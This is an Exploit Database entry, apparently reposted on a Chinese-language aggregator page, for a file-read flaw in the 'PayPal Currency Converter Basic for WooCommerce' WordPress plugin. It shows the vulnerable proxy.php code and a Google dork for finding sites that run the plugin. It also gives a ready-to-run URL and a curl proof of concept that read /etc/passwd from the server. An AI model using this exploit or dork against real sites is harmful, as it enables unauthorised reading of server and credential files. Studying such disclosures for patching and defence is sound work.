WordPress Plugin Paypal Currency Converter Basic For WooCommerce – File Read

• Exploit Database
• 15 阅读

• 作者： Kuroi'SH
  日期： 2015-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37253/

• # Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
  # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
  # Date: 10/06/2015
  # Exploit Author: Kuroi'SH
  # Software Link:
  PayPal Currency Converter BASIC for WooCommerce
  
  # Version: <=1.3
  # Tested on: Linux
   Description:
   proxy.php's code:
   <?php
  $file = file_get_contents($_GET['requrl']);
  $left=strpos($file,'<div id=currency_converter_result>');
  $right=strlen($file)-strpos($file,'<input type=hidden name=meta');
  $snip= substr($file,$left,$right);
  echo $snip;
  ?>
  Based on user input, the content of a file is printed out (unfortunately
  not included) so any html file can be loaded, and an attacker may be able
  to readany local file which
  is not executed in the server.
  Example:
  http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
  POC:
  curl --silent --url
  http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd